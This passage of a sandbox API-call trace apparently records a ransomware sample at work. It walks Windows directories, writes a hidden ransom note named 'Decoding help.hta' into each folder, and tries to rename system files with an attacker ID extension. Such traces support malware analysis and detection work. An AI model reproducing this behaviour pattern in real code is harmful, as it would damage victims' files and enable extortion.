ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.363] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.363] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.363] FindNextFileW (in: hFindFile=0x671270, lpFindFileData=0x22ccfd30 | out: lpFindFileData=0x22ccfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Replicate", cAlternateFileName="REPLIC~1")) returned 1 [0047.363] lstrcmpW (lpString1=".", lpString2="Replicate") returned -1 [0047.363] lstrcmpW (lpString1="..", lpString2="Replicate") returned -1 [0047.363] lstrcmpiW (lpString1="windows", lpString2="Replicate") returned 1 [0047.363] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\*.*" [0047.363] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\*.*") returned 45 [0047.363] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\", lpString2="Replicate" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate" [0047.363] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\*.*" [0047.363] GlobalMemoryStatus (in: lpBuffer=0x22ccfd10 | out: lpBuffer=0x22ccfd10) [0047.363] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10e2ec98, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x360 [0047.395] CloseHandle (hObject=0x360) returned 1 [0047.395] FindNextFileW (in: hFindFile=0x671270, lpFindFileData=0x22ccfd30 | out: lpFindFileData=0x22ccfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Replicate", cAlternateFileName="REPLIC~1")) returned 0 [0047.396] FindClose (in: hFindFile=0x671270 | out: hFindFile=0x671270) returned 1 Thread: id = 517 os_tid = 0xc58 [0047.376] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*", lpFindFileData=0x22e0fd30 | out: lpFindFileData=0x22e0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xa21b3607, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa21b3607, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3130 [0049.321] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.321] FindNextFileW (in: hFindFile=0x5e3130, lpFindFileData=0x22e0fd30 | out: lpFindFileData=0x22e0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xa21b3607, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa21b3607, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.321] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.321] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.321] FindNextFileW (in: hFindFile=0x5e3130, lpFindFileData=0x22e0fd30 | out: lpFindFileData=0x22e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcf9a66, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe067905, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xdcf9a66, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkObj.dll.mui", cAlternateFileName="")) returned 1 [0049.650] lstrcpyW (in: lpString1=0x24e4ed30, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" [0049.650] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned 70 [0049.650] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta" [0049.650] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\decoding help.hta")) returned 0xffffffff [0049.650] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x710 [0051.364] WriteFile (in: hFile=0x710, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x22e0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x22e0fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0054.016] CloseHandle (hObject=0x710) returned 1 [0055.314] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.149] lstrcmpiW (lpString1="Decoding help.hta", lpString2="InkObj.dll.mui") returned -1 [0058.149] lstrlenW (lpString="InkObj.dll.mui") returned 14 [0058.149] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" [0058.149] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned 70 [0058.149] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\", lpString2="InkObj.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" [0058.149] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" [0058.150] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0058.150] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.068] FindNextFileW (in: hFindFile=0x5e3130, lpFindFileData=0x22e0fd30 | out: lpFindFileData=0x22e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="micaut.dll.mui", cAlternateFileName="")) returned 1 [0059.068] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" [0059.068] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned 70 [0059.068] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta" [0059.068] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\decoding help.hta")) returned 0x1 [0059.068] lstrcmpiW (lpString1="Decoding help.hta", lpString2="micaut.dll.mui") returned -1 [0059.068] lstrlenW (lpString="micaut.dll.mui") returned 14 [0059.068] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" [0059.068] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned 70 [0059.069] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\", lpString2="micaut.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" [0059.069] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" [0059.069] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0059.069] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.069] FindNextFileW (in: hFindFile=0x5e3130, lpFindFileData=0x22e0fd30 | out: lpFindFileData=0x22e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1101e045, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="mip.exe.mui", cAlternateFileName="")) returned 1 [0059.069] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" [0059.069] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned 70 [0059.069] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta" [0059.069] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\decoding help.hta")) returned 0x1 [0059.069] lstrcmpiW (lpString1="Decoding help.hta", lpString2="mip.exe.mui") returned -1 [0059.069] lstrlenW (lpString="mip.exe.mui") returned 11 [0059.069] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" [0059.069] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned 70 [0059.069] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\", lpString2="mip.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" [0059.069] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" [0059.069] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0059.069] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.069] FindNextFileW (in: hFindFile=0x5e3130, lpFindFileData=0x22e0fd30 | out: lpFindFileData=0x22e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mshwLatin.dll.mui", cAlternateFileName="")) returned 1 [0059.070] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" [0059.070] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned 70 [0059.070] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta" [0059.070] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\decoding help.hta")) returned 0x1 [0059.070] lstrcmpiW (lpString1="Decoding help.hta", lpString2="mshwLatin.dll.mui") returned -1 [0059.070] lstrlenW (lpString="mshwLatin.dll.mui") returned 17 [0059.070] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" [0059.070] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned 70 [0059.070] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\", lpString2="mshwLatin.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" [0059.070] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" [0059.070] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0059.070] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.422] FindNextFileW (in: hFindFile=0x5e3130, lpFindFileData=0x22e0fd30 | out: lpFindFileData=0x22e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcad4f4, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe067905, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xdcad4f4, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="rtscom.dll.mui", cAlternateFileName="")) returned 1 [0059.422] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" [0059.422] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned 70 [0059.422] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta" [0059.422] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\decoding help.hta")) returned 0x1 [0059.422] lstrcmpiW (lpString1="Decoding help.hta", lpString2="rtscom.dll.mui") returned -1 [0059.422] lstrlenW (lpString="rtscom.dll.mui") returned 14 [0059.422] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" [0059.422] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned 70 [0059.422] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\", lpString2="rtscom.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" [0059.422] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" [0059.422] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0059.422] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.422] FindNextFileW (in: hFindFile=0x5e3130, lpFindFileData=0x22e0fd30 | out: lpFindFileData=0x22e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipBand.dll.mui", cAlternateFileName="")) returned 1 [0059.423] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" [0059.423] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned 70 [0059.423] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta" [0059.423] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta" (normalized: "c:\\program files 